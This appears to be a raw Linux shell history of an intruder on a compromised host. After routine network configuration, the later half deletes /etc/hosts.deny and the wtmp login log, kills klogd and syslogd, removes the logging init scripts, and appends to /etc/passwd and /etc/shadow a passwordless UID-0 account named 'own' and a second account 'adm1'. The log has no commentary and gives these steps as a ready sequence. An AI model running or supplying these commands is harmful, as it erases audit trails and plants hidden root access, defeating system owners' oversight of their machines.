mkdir /floppy
mount /dev/fd0 /floppy
cd /floppy
ls
rm *gz
./init
cd
umount /floppy
exit
ifconfig -a
cd /etc/sysconfig
ls
vi network
ls
ls
cd *pts
ls
cd ../net*pts
ls
vi *eth0
ifconfig eth0 172.16.1.107 broadcst 172.16.1.255 netmask 255.255.255.0 up
ifconfig -a
ifconfig eth0 broadcast 172.16.1.255
ifconfig eht0 netmask 255.255.255.0
ifconfig eth0 netmask 255.255.255.0
ifconfig -a
route add default gw 172.16.1.254
netstat -nr
exit
uptime
rm -rf /etc/hosts.deny
touch /etc/hosts.deny
rm -rf /var/log/wtmp
touch /var/log/wtmp
killall -9 klogd
killall -9 syslogd
rm -rf /etc/rc.d/init.d/*log*
echo own:x:0:0::/root:/bin/bash >> /etc/passwd
echo adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash >> /etc/passwd
echo own::10865:0:99999:7:-1:-1:134538460 >> /etc/shadow
echo adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412 >> /etc/shadow
cat /etc/inetd.conf | grep tel
exit
                                                                                                                                                              